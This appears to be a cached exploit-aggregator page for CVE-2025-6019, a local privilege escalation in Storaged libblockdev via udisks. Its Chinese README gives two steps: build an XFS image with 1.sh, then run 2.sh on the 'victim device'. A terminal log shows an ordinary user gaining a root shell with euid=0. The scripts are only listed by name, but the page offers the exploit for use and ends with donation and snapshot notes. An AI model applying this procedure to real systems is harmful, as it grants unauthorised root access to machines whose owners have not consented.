Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-6019 PoC — Storaged libblockdev 安全漏洞

Source
Associated Vulnerability
Title:Storaged libblockdev 安全漏洞 (CVE-2025-6019)
Description:Storaged libblockdev是Storaged开源的一个用于操纵块设备的库。 Storaged libblockdev存在安全漏洞,该漏洞源于与udisks守护进程交互方式不当,可能导致本地权限提升。
Readme
# CVE-2025-6019_Exploit

- 第一步 在linux设备上运行1.sh,构建xfs.image

- 第二步 将xfs.image传入受害设备执行2.sh 如下即为成功

``` shell
neko@aosc-neko205 [ tmp ] $ bash 2.sh 
当前用户: neko
uid=1000(neko) gid=1001(neko) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
('yes',)
Mapped file /home/neko/xfs.image as /dev/loop0.
成功找到 Root Shell: /tmp/blockdev.IK6D92/root-shell
正在提权...
root-shell-5.2# id
uid=1000(neko) gid=1001(neko) euid=0(root) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
root-shell-5.2# 
```
File Snapshot

[4.0K] /data/pocs/e6c0625b91ab0636cc5adc00dd3faca513050551 ├── [ 374] 1.sh ├── [ 996] 2.sh └── [ 658] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.